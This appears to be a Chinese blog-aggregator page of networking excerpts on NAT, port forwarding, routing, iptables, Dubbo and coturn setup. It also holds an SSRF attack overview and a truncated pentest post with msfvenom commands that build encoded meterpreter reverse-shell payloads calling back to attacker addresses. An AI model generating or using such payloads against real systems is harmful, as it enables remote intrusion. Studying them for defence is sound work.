内网ip

外网IP和内网IP的区别

拥有回忆 提交于 2019-12-19 04:19:57
这两天遇到一个bug,折腾的够呛,已经上线的项目,出现了个人登录不上的情况,瞬间整个人都不好了,首先找问题,在本地和测试服务器上都没问题,打包发布到正式环境就出现问题了,刚开始我看不了日志,日志要找别人要,自己各种方法折腾,后来要到日志,看了半天,突然发现后台报错连接超时,这是什么鬼?本地、测试都没问题,正式环境报这个问题,幸好同事之前经历过同样的事情,我说连接超时,他有点印象,原来是Linux服务器不能二次通过外网访问自己,要换成内网IP,然后就解决了问题,困扰了一天半,有感之余学习下外网IP和内网IP的区别: 作者:小胖KKang 链接:https://www.zhihu.com/question/43517806/answer/96122327 来源:知乎 著作权归作者所有,转载请联系作者获得授权。 1,内外网的关系: 用现实来比喻,公网地址类似于公共的地址, 深圳市罗湖区罗湖一路二巷504号罗湖大厦---公网地址,这个地址是全市唯一的。 罗湖大厦 B座3A层502房 ----内网地址--------任何大厦都可以有 B座3A层502房 如果给每间房屋分配一个地址,城市的地址会又混乱又不够用。 2,IP地址的分类: A,B,C类网络继续用现实来比喻类似于上述中的房 ,层,区,座的概念。 现在罗湖大厦这个“内网”为例,我有什么办法给1000间房子做标记。 A类地址

华为USG防火墙nat环回配置

泄露秘密 提交于 2019-12-06 12:38:06
网络环境介绍: 公司内网有一台web服务器,地址是192.168.100.100,web服务端口为80,并且为这台web服务器申请了DNS A记录的域名解析服务,解析记录是公司出口ip地址100.100.100.100。在办公区网络环境里,还有内网192.168.10.0网段,需要通过申请的域名来访问公司内网的192.168.100.100的web服务。 做法是在防火墙的出口,做一条端口映射,100.100.100.100:80到192.168.100.100:80的端口映射。 问题来了,做好端口映射以后,其他外部网络通过域名访问公司的web服务是正常的,但是公司内网用户通过域名访问公司自己的web服务,却无法访问;而公司内网用户通过192.168.100.100:80私有地址访问,是正常的。这种情况,就是因为做好端口映射以后,访问web服务的流量在响应的时候流量没有回流到防火墙导致的。 原因分析: 如上图,假如是192.168.10.10通过申请的域名访问192.168.100.100的web服务。这里假设访问的源端口是10000,目标端口是80,数据包分析如下: C2主机发起web请求.因为通过域名访问的,DNS解析服务正常,那么访问目标就是100.100.100.100:80 192.168.10.10:10000--->100.100.100.100:80

如何在外面访问家里的内网计算机?【端口转发】

不羁岁月 提交于 2019-12-05 03:16:21
曾经的Teamviewer、向日葵现在都不太香了,要么限时,要么限速,每次还要切换分辨率,真是相当麻烦。经过一番折腾,发现还是微软爸爸的 远程桌面连接 好用,清晰度高,流畅度高,还能自动调节分辨率,用笔记本远程台式机再也不用眯着眼。 因为家里网线一般是先连路由器,其他设备再通过网线或WIFI连接到网络,所以这些设备都成了内网设备,是无法通过IP直接访问的。这些设备一般会被分发到以 192.168.1 开头(与路由的网关设置有关,可以自定义)的IP地址。 这样的话,有两种手段可以实现内网访问: 使用内网穿透工具,流行的比如:花生壳 在路由上建立端口转发规则 两者原理其实差不多,都是将内网地址映射到外网地址,以实现内网的访问。本文主要记录第二种方案。 首先,需要修改家里设备(后面称为设备0)的远程桌面端口,默认是3389,如果不改可能会被机器人各种扫描。所以改一下再用比较安全,这里网上教程很多,放一个链接吧: Win系统如何修改远程桌面端口3389 然后,一般还需要对刚刚换的端口开放防火墙,再放一个链接: window如何设置防火墙开放端口 这样,这个端口就可以进行远程访问了,可以用另一台电脑连上家里的WIFI,在 远程桌面连接 里输入设备0的IP加端口(记为port0),也就是 ip:port0 ,实现对该电脑的访问。 但这时还不能在外网访问到设备0,下面是最关键的一步,设置端口转发

SSRF绕过姿势

两盒软妹~` 提交于 2019-12-04 23:13:22
0x00 什么是SSRF? SSRF(Server-Side Request Forgery,服务器端请求伪造):是一种由攻击者构造形成由服务器端发起请求的一个漏洞。 SSRF 攻击的目标是从外网无法访问的内部系统 漏洞成因 服务端提供了从其他服务器应用获取数据的功能且没有对目标地址作过滤和限制。 0x01 SSRF的危害 攻击者可利用SSRF绕过防火墙,接触内部网络 攻击者可以利用 SSRF 实现的攻击主要有 5 种: 可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的 banner 信息 攻击运行在内网或本地的应用程序(比如溢出) 对内网 WEB 应用进行指纹识别,通过访问默认文件实现 攻击内外网的 web 应用,主要是使用 GET 参数就可以实现的攻击(比如 Struts2,sqli 等) 利用 file 协议读取本地文件等 0x02 SSRF出现场景 能够对外发起网络请求的地方,就可能存在 SSRF 漏洞 从远程服务器请求资源(Upload from URL,Import & Export RSS Feed) 数据库内置功能(Oracle、MongoDB、MSSQL、Postgres、CouchDB) Webmail 收取其他邮箱邮件(POP3、IMAP、SMTP) 文件处理、编码处理、属性信息处理(ffmpeg、ImageMagic、DOCX、PDF、XML)

win10 双网卡设置内网和外网同时访问

亡梦爱人 提交于 2019-12-04 23:00:26
当前环境是内网使用固定ip 用有线连接 外网自动获取使用wifi模块连接wifi cmd窗口下运行route print -4 打印路由信息 首先删除 所有0.0.0.0的路由,也就是默认设置 route delete 0.0.0.0 添加设置外网路由走无线 route -p add 0.0.0.0 mask 0.0.0.0 172.16.8.1 metric 2 if 14 #此网关为外网路由,可根据自己的外网网关进行调整 添加指定的ip段到内网 route -p add 172.16.0.0 mask 255.255.255.0 172.16.2.254 metric 1 if 19 -p 是为了设置为静态永久路由,防止重启时配置消失 因为上面我们添加的是静态路由,所以,重起后,tcp/ip设置里的默认网络会成为活动网关,这样也会造成路由冲突,所以,需要把内网的tcp/ip设置里的网关去掉 由于我这里需要访问的内网ip地址为172.16.0.99,因此我添加了172.16.0.0网段,使用内网路由 route -p add 172.16.0.0 mask 255.255.255.0 172.16.2.254 但是在此设置过程中发现不能访问172.16.0.55的内网ip地址了 *** win10 路由参数说明 Interface List: 网络卡列表 Active

iptables转发技术

∥☆過路亽.° 提交于 2019-12-04 17:44:59
1 | 0 NAT 1 | 1 一. 什么是 NAT NAT(Network Address Translation)译为网络地址转换。通常路由器在转发我们的数据包时,仅仅会将源MAC地址换成自己的MAC地址,但是NAT技术可以修改数据包的源地址、目的地址以及源端口、目的端口等信息。 1 | 2 二. NAT的作用 NAT技术最常见的应用就是通过修改源IP地址实现内网多主机使用一个公网地址接入互联网。NAT技术通常用于端口和流量的转发、重定向,实现如端口映射、跨网络访问、流量代理等功能。 1 | 3 二. iptables实现NAT转发 1.语法及参数介绍 iptables [- t TABLE ] COMMAND CHAIN [ num ] 匹配条件 - j 处理动作 要使用iptables的NAT功能,我们首先需要 启用网卡的IP转发功能 echo 1 > /proc/ sys / net / ipv4 / ip_forward 如果想要永久生效,我们要编辑 /etc/sysctl.conf 文件,设置 net.ipv4.ip_forward = 1 ,然后用 sysctl -p 命令使配置文件生效。 我们使用 -t nat 参数指明使用nat表,因为iptables默认使用filter表。 nat表同filter表一样有三条缺省的"链"(chains):

【NetWork】外网和内网

淺唱寂寞╮ 提交于 2019-12-04 15:17:50
外网和内网 2019-11-16 11:22:37 by冲冲 1、内网 ① 内网的电脑们,需要经过交换机、路由器,才能访问Internet(外网)。 ② 因为外网IP比较紧张,现在的电脑普及使得外网IP根本不够用,内网的产生解决这个难题。 ③ 路由器只需要一个外网IP,就能提供下面的众多电脑联网。因为不同的内网IP是可以重复使用。(比如网吧只需要一个外网IP) ④ 内网IP的类型: 10.0.0.0~10.255.255.255 172.16.0.0~172.31.255.255 192.168.0.0~192.168.255.255 2、外网 ① 外网不用经过路由器或交换机,直接连接Internet和电脑。 ② 普通人不能拥有外网IP,因为一个人用外网IP简直太浪费。所以我们通常是通过内网去上网(连接Internet)。 ③ 外网IP通常用于企业,学校等机构。 ④ 外网IP都有哪些呢?除了内网IP之外的都是外网IP。 来源: https://www.cnblogs.com/yadiel-cc/p/11871229.html

解决dubbo注册zookeeper默认内网ip注册

岁酱吖の 提交于 2019-12-04 05:38:58
  前端时间做新项目的时候遇到一个dubbo的一个问题,在我们项目搭建好后使用了其他同事的支付服务,支付服务架构的方式使用了dubbo服务的方式,使用zookeeper作为注册中心,我们新项目使用dubbo注解的方式引用dubbo服务,然后项目启动的时候发生了我们最不愿意看到的一件事,项目跑不起来了。查看了一下服务,确认服务没有挂,并且在dubbo的管理工具上也找到了这个服务,回到程序报错去看(测试服务器还在使用,就没还原报错信息),发现了一个没见过的IP,很明显是一个内网IP。支付服务跟注册中心都是在一台服务器,而服务的消费者是我的本机,所以内网IP是不能找到支付服务的。也就是说Zookeeper将Dubbo服务生产者的内网地址给了消费者,如果想使用支付服务将消费者放到同一台服务器上就可以找到了,但是这不是解决问题的根本方法,为什么会出现上面的情况,查看了hosts文件发现,是由于在服务器hosts配置的文件将主机名指向了内网IP地址      如此zookeeper才会将内网IP提供给消费者,我们只需要加一个公网IP即可解决问题      hosts文件修改后就能生效,然后重启zookeeper,重启dubbo服务,然后发现可以找到服务了(这里我马赛克了一下,大家也都能看懂,前面就是公网IP然后空格主机名称然后空格主及名称)  

coturn穿透服务器安装方法

匿名 (未验证) 提交于 2019-12-03 00:32:02
前面章节我们介绍了webrtc服务器janus的安装 https://blog.csdn.net/bvngh3247/article/details/80648584 ,如果网络无法穿透的时候就需要 turn 服务器来保证视频通话的成功率。turn 包含了stun的功能,所以只需要部署turn服务器即可。 git clone https://github.com/coturn/coturn cd coturn ./configure make sudo make install 使用命令:which turnserver 使用下面命令找一下turnserver.conf文件,我们将复制或者移动其放在 /usr/local/etc/turnserver.confĿ¼ 注意:/usr/local/etc/turnserver.conf配置文件,其实放在哪个位置不重要,他会自动寻找。会打印出对应的信息的。所以放在哪个位置不重要,我是直接放在 /usr/local/etc/turnserver.conf。 最后修改配置文件,在修改之前先完成下面几步,也可以使用简单的配置: vim /usr/local/etc/turnserver.conf 在这之前先查看网卡:ifconfig 记录下内网ip号:172.17.232.28,我的外网ip 39.105.105.159

穿越边界的姿势

匿名 (未验证) 提交于 2019-12-03 00:26:01
前言 上个学期一直在学审计,前几天ST2漏洞大火,随便打一个就是root权限,我却拿着root权限不知如何继续进行。因为这个,发现了自己对渗透知识的缺失,因此用了两周左右的时间学习补充了一下内网渗透的知识,看了不少大牛的文章,膜拜之余还是做了一些笔记的。到渗透入门结束之余,打算自己整理一下最近学习到的关于渗透的知识,写一篇文章。 回过头看渗透,在机械流程的前提下,什么情况下使用什么工具,做出什么反应的适应性思路更为重要。一次大快人心的渗透过程与扎实的基础知识和熟练的工具使用是分不开的。 渗透初探 一个概念 正向shell: 攻击者连接被攻击者机器,可用于攻击者处于内网,被攻击者处于公网的情况。 反向shell: 被攻击者主动连接攻击者,可用于攻击者处于外网,被攻击者处于内网的情况。 msf shell 反向shell 正向shell Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o isshell Windows:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=121.196.209.139 LPORT=4444 -f